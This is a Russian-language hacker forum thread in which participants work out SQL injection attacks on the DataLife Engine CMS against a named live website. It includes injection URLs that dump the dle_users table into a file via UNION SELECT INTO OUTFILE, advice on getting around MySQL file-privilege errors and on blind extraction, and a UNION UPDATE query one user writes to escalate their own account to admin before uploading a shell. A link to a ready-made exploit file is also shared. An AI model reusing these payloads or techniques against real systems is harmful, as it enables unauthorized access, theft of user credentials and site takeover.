Движок DataLife Engine (http://www.pc-soft.ru/static/datalife.html) уже очень известний и стоит на многих варезный и новостных порталах
http://www.pc-soft.ru/index.php?subaction=userinfo&user=%2527[SQL]

жаль, но бесполезная бня. На странице несколько sql запросов с выборкой на основе переменной $user с разным количеством возвращаемых данных. UNION запрос составить не получилось =(

Ну прям уже бесполезная:
http://www.pc-soft.ru/index.php?subaction=userinfo&user=%2527%20UNION+SELECT+*+FROM+%60dle_users%60%2 0INTO%20OUTFILE%20%2527/vseravno/net/prav/file.txt

...UNION запрос составить не получилось =(
наверное версия MySQL ниже 4

2 budulay
UNION не получилось по причине, что я изложил в своем посте. Писать заново влом =)))) сорри. А насчет INTO OUTFILE... Спорный вопрос. Если в mysql не запрещены функции для работы с файлами, то вполне реальная уязвимость. Беру свои слова обратно. Молодец блин =) ставлю плюс тебе =)

А объясните мне пожалуйста что означает %2527

%25 - Код символа %
%27 код сивола '
Тоесть из %2527 получается %27

Ну прям уже бесполезная:
http://www.pc-soft.ru/index.php?subaction=userinfo&user=%2527%20UNION+SELECT+*+FROM+%60dle_users%60%2 0INTO%20OUTFILE%20%2527/vseravno/net/prav/file.txt


наверное версия MySQL ниже 4

Блин пачему на локалке нормально файл сохраняет а на серваке нет? пишет Access denied for user ...
путь к сохранению указываю от самого корня и в папку разрешенную на запись
Че за фингя?

1) юзай поиск
2) читай статьи от ЗаКо
3) это потому что file_priv=0, т.е. привилегии mysql на запись\чтение произвольных файлов (с правами юзера под которым запущен mysql). Если они ровны 0(а у тебя на локалхосте видать 1), то ты не можешь производить действия с файлами.

Этот движок вчера взломали...

Если у майскуля нет прав на запись/чтение файлов то остаються 2 вещи: бренчмарк) или посимвольный перебор с надеждой что к базе имеет боступ не только локалхост...

Этот движок вчера взломали...
Интересно... не мог бы ты линк кинуть на описание бвги??? :rolleyes:

А я то тут причем... Я видел что сайт этого движка взломали вот и все

блин парни скажите что не так в этом запросе?

SQL-запрос:

SELECT *
FROM dle_users
WHERE name = ''
UNION UPDATE dle_users SET email = "123@bk.ru",
PASSWORD = "********************************",
name = "DEX",
user_id =2,
news_num =0,
comm_num =0,
user_group =1,
lastdate = "1149619615",
reg_date = "1149619615",
banned = "",
allow_mail =1,
info = "",
signature = "",
foto = "",
fullname = "",
land = "",
icq = "",
favorites =1,
pm_all =0,
pm_unread =0 WHERE user_id =2-- LIMIT 0, 30

Через юнион пытаюсь повысить права для своего акаунта
и вообще будет ли работать select с union update?

после union только select

гы классно меня уже чайником обозвали =)))
сколько статей ни читал про sql inj нигде не написано что unioun может работать только с select ... вообщем не важно... так кто-нибудь чего-нибудь придумал с этим запросом?
index.php?subaction=userinfo&user=%2527

А то я уже знаю как определить полный путь к корневой папке и зак залить шелл тоже придумал осталось вот только каким-то образом доступ в админку получить =)))

http://rst.void.ru/

появилось два сплоита под даталайф..

Молодцы rst, сколько приходилось работать с даталайф не чего тупого я не видел, по идее весь код можно было уместить в 2 раза меньше. В последсвии пришлось самому писать новостной движок!

http://rst.void.ru/

народ, а ктонить успел скачать-то!! Выложите ! а то линка уже не пашет

специально для тех кто неможит нормально искать _http://rst.void.ru/download/r57datalife.txt